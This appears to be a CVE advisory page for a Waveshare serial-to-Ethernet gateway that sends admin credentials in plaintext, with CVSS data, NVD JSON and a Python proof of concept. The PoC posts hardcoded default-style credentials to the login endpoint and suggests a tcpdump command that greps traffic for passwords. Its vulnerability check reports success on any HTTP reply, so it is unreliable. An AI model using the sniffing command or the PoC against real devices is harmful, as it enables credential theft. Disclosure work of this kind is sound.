CVE-2025-63364

Description

Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to transmit Administrator credentials in plaintext.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:waveshare:rs232\/485_to_wifi_eth_\(b\)_firmware:3.1.1.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:waveshare:rs232\/485_to_wifi_eth_\(b\):4.3.2.1:*:*:*:*:*:*:* - NOT VULNERABLE

Waveshare RS232/485 TO WIFI ETH (B) Firmware V3.1.1.0

Hardware Version 4.3.2.1

Webpage Version V7.04T.07.002880.0301

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-63364 PoC - Waveshare Gateway Plaintext Credential Transmission
# Description: This PoC demonstrates capturing plaintext admin credentials from the vulnerable device

import requests
import json
from urllib.parse import urlencode

TARGET_IP = "192.168.1.100"  # Target device IP
LOGIN_URL = f"http://{TARGET_IP}/cgi-bin/login"

def capture_credentials():
    """
    Simulate credential capture via network sniffing.
    In real attack, use Wireshark/tcpdump to capture HTTP traffic.
    """
    # This PoC shows the vulnerable login request structure
    payload = {
        "username": "admin",
        "password": "admin123"
    }
    
    # Vulnerable: credentials sent in plaintext
    try:
        response = requests.post(LOGIN_URL, data=payload, timeout=5)
        print(f"[+] Response Status: {response.status_code}")
        print(f"[+] Raw Request (vulnerable): {payload}")
        
        # In real attack, capture this via:
        # tcpdump -i eth0 -A 'tcp port 80' | grep password
        return True
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection failed: {e}")
        return False

def verify_vulnerability():
    """
    Check if target device is vulnerable by attempting login
    and observing response patterns.
    """
    print(f"[*] Testing CVE-2025-63364 on {TARGET_IP}")
    print("[*] Vulnerable versions: Firmware V3.1.1.0, HW 4.3.2.1, Webpage V7.04T.07.002880.0301")
    
    result = capture_credentials()
    if result:
        print("[!] Device appears to transmit credentials in plaintext")
        print("[!] Attackers can capture admin credentials via network sniffing")
    
    return result

if __name__ == "__main__":
    verify_vulnerability()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-63364
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-63364
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-63364/
[4] VulDB https://vuldb.com/cve/CVE-2025-63364
[5] https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing
[6] https://otsecverse.github.io/OTSecVerse/posts/Post-4/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-63364", "sourceIdentifier": "[email protected]", "published": "2025-12-04T17:15:56.380", "lastModified": "2025-12-16T20:59:38.410", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Waveshare RS232/485 TO WIFI ETH (B) Serial to Ethernet/Wi-Fi Gateway Firmware V3.1.1.0: HW 4.3.2.1: Webpage V7.04T.07.002880.0301 was discovered to transmit Administrator credentials in plaintext."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:waveshare:rs232\\/485_to_wifi_eth_\\(b\\)_firmware:3.1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F7FD270F-5998-4F41-A80E-8017DF6A142B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:waveshare:rs232\\/485_to_wifi_eth_\\(b\\):4.3.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "F085A075-48AC-42E4-9BA6-DBB9A8B2935B"}]}]}], "references": [{"url": "https://drive.google.com/file/d/1AGv9KWMTB71NJfIOncuNO6FyK0UAqxmL/view?usp=sharing", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://otsecverse.github.io/OTSecVerse/posts/Post-4/", "source": "[email protected]", "tags": ["Third Party Advisory", "Mitigation"]}]}}